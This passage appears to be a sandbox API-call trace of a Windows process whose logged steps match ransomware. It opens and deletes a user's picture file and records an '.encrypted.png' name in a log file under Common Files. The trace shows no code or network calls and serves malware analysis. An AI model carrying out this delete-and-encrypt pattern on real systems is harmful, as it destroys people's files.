(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0039.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0039.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0039.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.809] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.809] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.809] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.809] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0039.809] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.809] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.809] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.809] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.809] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.809] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.809] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.810] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.810] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.810] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.810] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.810] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.810] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.810] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.810] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.810] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.810] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0039.810] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.810] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\80l2tdxo4fcaf.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0039.810] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.810] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.810] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.810] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.810] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0039.810] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.811] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.811] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.811] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.811] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.811] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0039.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.811] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.811] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.811] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.812] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.812] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png", lpFilePart=0x0) returned 0x68 [0039.812] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9f64d90, ftCreationTime.dwHighDateTime=0x1d5be9e, ftLastAccessTime.dwLowDateTime=0x1e377b00, ftLastAccessTime.dwHighDateTime=0x1d5c2d6, ftLastWriteTime.dwLowDateTime=0x176fb980, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x4e3f, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="80l2TDxo4fCaf.png", cAlternateFileName="80L2TD~1.PNG")) returned 0x7c2240 [0039.812] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\80l2tdxo4fcaf.png")) returned 1 [0039.813] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9f64d90, ftCreationTime.dwHighDateTime=0x1d5be9e, ftLastAccessTime.dwLowDateTime=0x1e377b00, ftLastAccessTime.dwHighDateTime=0x1d5c2d6, ftLastWriteTime.dwLowDateTime=0x176fb980, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x4e3f, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="80l2TDxo4fCaf.png", cAlternateFileName="80L2TD~1.PNG")) returned 0 [0039.813] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.813] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.813] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0039.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0039.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.813] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.814] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0039.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.814] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.814] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0039.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.814] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.814] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0039.814] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.815] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.815] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0039.815] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.815] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.815] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0039.815] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2ab8, lpOverlapped=0x0) returned 1 [0039.815] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0039.815] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x2ab8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.816] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0039.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.encrypted.png\r\n", cchWideChar=117, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 117 [0039.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x75) returned 0x7800d0 [0039.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.encrypted.png\r\n", cchWideChar=117, lpMultiByteStr=0x7800d0, cbMultiByte=117, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.encrypted.png\r\n", lpUsedDefaultChar=0x0) returned 117 [0039.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0039.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0039.816] WriteFile (in: hFile=0x128, lpBuffer=0x7d5bb8*, nNumberOfBytesToWrite=0x74, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7d5bb8*, lpNumberOfBytesWritten=0x6aee3c*=0x74, lpOverlapped=0x0) returned 1 [0039.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0039.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.816] CloseHandle (hObject=0x128) returned 1 [0039.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0039.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0039.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0039.817] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0039.817] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0039.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: 